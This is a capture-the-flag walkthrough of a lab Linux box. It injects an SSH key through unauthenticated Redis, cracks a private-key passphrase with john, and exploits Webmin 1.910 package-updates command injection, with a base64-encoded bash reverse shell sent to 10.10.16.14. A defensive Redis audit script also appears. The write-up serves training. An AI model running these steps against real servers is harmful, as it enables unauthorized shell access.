Information gathering

| IP Address | Open Ports |
|---|---|
| 10.10.10.160 | TCP: 22, 80, 6379, 10000 |
```
$ nmap -p- 10.10.10.160 --min-rate 1000 -sC -sV
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Unauthenticated Redis access & SSH public key injection
```
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
10.10.10.160:6379> CONFIG GET dir
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
```
The CONFIG SET succeeding confirms that the directory exists.
```
$ cat ~/.ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh
$ (echo -e "\n\n"; cat ~/.ssh/id_ed25519.pub; echo -e "\n\n") > key.txt; cat key.txt | redis-cli -h 10.10.10.160 -x set id_rsa_key
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> GET id_rsa_key
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
10.10.10.160:6379> save
10.10.10.160:6379> exit
```
CONFIG SET is used here to change the dir and dbfilename options, which normally control the directory and filename of the Redis persistence (RDB) file. With both pointed at the .ssh directory and authorized_keys, the SAVE makes Redis write its data out as an authorized_keys file in that directory.
```
$ ssh -i ~/.ssh/id_ed25519 redis@10.10.10.160
```
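As an added example (not part of the write-up), a small defender-side check for the two things this step depends on: a redis.conf that lets unauthenticated clients repoint dir and dbfilename, and an authorized_keys file that a Redis SAVE has overwritten with an RDB dump. The sample configs and the sample authorized_keys bytes are constructed, not taken from the target.

```python
# Added example (not part of the write-up): defender-side checks for the two
# artefacts of this technique, a redis.conf that permits unauthenticated
# CONFIG SET, and an authorized_keys file that Redis SAVE has written.

# Constructed sample configs; they are not the target's files.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
"""


def audit_redis_conf(conf: str) -> list:
    """Return findings for settings that let remote clients repoint dir/dbfilename."""
    opts = {}
    for line in conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        opts.setdefault(key.lower(), []).append(value.strip())
    findings = []
    if "requirepass" not in opts:
        findings.append("no requirepass: anyone who can reach the port has full access")
    if opts.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode disabled")
    binds = opts.get("bind", [""])[0].split()
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes Redis on every interface")
    if not any(v.upper().startswith("CONFIG ") for v in opts.get("rename-command", [])):
        findings.append("CONFIG not renamed: dir and dbfilename can be changed at runtime")
    return findings


def authorized_keys_written_by_redis(data: bytes) -> bool:
    """An RDB dump starts with the magic 'REDIS' plus a version number; sshd skips
    the junk lines, but the magic shows the file was produced by SAVE, not a user."""
    return data.startswith(b"REDIS") or b"\nREDIS" in data
```

Run audit_redis_conf over each host's redis.conf and authorized_keys_written_by_redis over every authorized_keys file owned by the redis service account; either finding is worth an alert.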
RSA private key decryption
```
$ cat /opt/id_rsa.bak
$ ssh2john id_rsa > ./id_rsa.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
password:computer2008
$ su Matt
```
User.txt
9d90e967236578fdf6be43ea87c03a53
Privilege escalation
```
$ whatweb https://10.10.10.160:10000 -v
$ searchsploit Webmin
```
https://github.com/KentVolt/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite
https://10.10.10.160:10000/
Log in with username Matt and password computer2008.
https://10.10.10.160:10000/package-updates/?xnavigation=1
```
$ sudo tcpdump -i any icmp
```
```http
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
Cookie: redirect=1; testing=1; sid=43462a3948984572e11138d45052c3d8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Progressive-Url: https://10.10.10.160:10000/package-updates/update.cgi
X-Requested-From: package-updates
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Length: 19
Origin: https://10.10.10.160:10000
Referer: https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

u=acl%2Fapt&u=$(ping%20-c%201%2010.10.16.14)
u=acl%2Fapt&u=$(echo${IFS}"L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTQvMTAwMzUgMD4mMScK"|base64${IFS}-d|bash)
```
Root.txt
ded02459b6863f771d4371e25ee2c11c